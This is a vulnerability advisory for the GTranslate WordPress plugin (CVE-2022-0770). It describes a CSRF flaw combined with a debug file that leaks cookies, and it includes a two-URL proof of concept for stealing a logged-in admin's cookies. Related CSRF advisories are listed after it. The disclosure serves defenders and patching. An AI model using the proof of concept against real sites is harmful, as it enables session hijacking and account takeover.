Translate WordPress with GTranslate < 2.9.9 – CSRF to Account Takeover | CVE 2022-0770 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in some files, and write debug data such as user's cookies in a publicly accessible file if a specific parameter is used when requesting them. Combining those two issues, an attacker could gain access to a logged in admin cookies by making them open a malicious link or page

Proof of Concept

Make a logged in admin (or any other account you want to gain access to) open

https://example.com/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=es&gurl=PoC&enable_debug

Then access https://example.com/wp-content/plugins/gtranslate/url_addon/debug.txt to get the users cookies

Affects Plugins

Fixed in 2.9.9

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Diogo Real

Verified

Yes

WPVDB ID

49abe79c-ab1c-4dbf-824c-8daaac7e079d

Timeline

Publicly Published

2022-03-07 (about 2 years ago)

Added

2022-03-07 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2014-09-28

Title

W3 Total Cache 0.9.4 - Edge Mode Enabling CSRF

Published

2024-03-29

Title

Easy Social Feed <= 6.5.6 - Cross-Site Request Forgery

Published

2024-04-10

Title

e2pdf < 1.23.00 - Cross-Site Request Forgery

Published

2021-06-17

Title

WP Fluent Forms < 3.6.67 - Cross-Site Request Forgery (CSRF)

Published

2014-08-01

Title

Acunetix WP Security 4.0.3 - /wp-admin/admin.php wps-database Page Backup Generation CSRF Weakness